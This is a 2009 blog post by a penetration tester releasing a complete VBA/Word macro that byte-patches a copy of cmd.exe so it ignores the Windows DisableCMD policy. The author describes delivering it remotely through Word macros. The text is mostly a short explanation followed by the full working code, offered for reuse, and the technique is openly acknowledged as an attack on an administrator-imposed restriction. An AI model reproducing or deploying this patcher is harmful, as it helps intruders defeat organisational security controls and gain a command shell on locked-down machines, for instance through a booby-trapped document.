Tuesday, September 01, 2009

DisableCMD - History Repeating

Before I start. This is nothing new! Actually its known since many years (e.g. http://blog.didierstevens.com/2007/11/28/quickpost-disableamd-disableregistryfools/)

During a pentest i needed to patch cmd.exe to ignore the disablecmd policy setting. Nothing new, nothing special, but i needed to do it from remote and i had to use VBA/Word macros. Long story short, i decided to release the code, because its nothing special and the technique is well known.

Here is a short video about it:

VBA Macro to remove DisableCMD CMD.EXE restriction from Max Moser on Vimeo.

Short video showing my VBA byte patcher written to overcome DisableCMD policy setting. Sorry but i at least expected a fail safe behavior.




I am not any good in coding vba but it might save someone some time. I will add an example.doc on remote-exploit.org as well.




Sub patchcmd()
Dim Sourcefile As String, TargetFile As String, Windir As String, Tempdir As String
Dim F1 As Integer, F2 As Integer
Dim bytepattern(19) As Byte
Dim WshShell As Object

Set WshShell = CreateObject("WScript.Shell")
Windir = WshShell.ExpandEnvironmentStrings("%WinDir%")
Tempdir = WshShell.ExpandEnvironmentStrings("%temp%")

bytepattern(0) = &H44 'D
bytepattern(1) = &H0
bytepattern(2) = &H69 'i
bytepattern(3) = &H0
bytepattern(4) = &H73 's
bytepattern(5) = &H0
bytepattern(6) = &H61 'a
bytepattern(7) = &H0
bytepattern(8) = &H62 'b
bytepattern(9) = &H0
bytepattern(10) = &H6C 'l
bytepattern(11) = &H0
bytepattern(12) = &H65 'e
bytepattern(13) = &H0
bytepattern(14) = &H43 'C
bytepattern(15) = &H0
bytepattern(16) = &H4D 'M
bytepattern(17) = &H0
bytepattern(18) = &H44 'D

Dim fileoffset As Long
fileoffset = 0
Dim patternoffset As Long
patternoffset = 0
Dim gotbad As Boolean

gotbad = False

Sourcefile = Windir & "\system32\cmd.exe"
Destfile = Tempdir & "\dmc.exe"

Dim tmpbyte As Byte

If Dir(Sourcefile) = "" Then Exit Sub
FileCopy Sourcefile, Destfile
F1 = FreeFile
Open Sourcefile For Binary As F1

F2 = FreeFile
Open Destfile For Binary As F2

While Not EOF(F1)
gotbad = False

Get #F1, , tmpbyte
If tmpbyte = bytepattern(patternoffset) Then
fileoffset = (Seek(F1) - 1)

While (gotbad = False)
Get #F1, , tmpbyte
patternoffset = patternoffset + 1
If tmpbyte = bytepattern(patternoffset) Then
If patternoffset > 18 Then
'Debug.Print "Found DisableCMD and position: " & fileoffset & "Patching it now"
Put #F2, fileoffset + 6, &H34
Close F1
Close F2
MsgBox "Yeah, run it from: " & Destfile, vbOKOnly, "CMD.EXE patched"
End
End If
Else
patternoffset = 0
gotbad = True
End If
Wend
End If
Wend
Close F1
Close F2
End Sub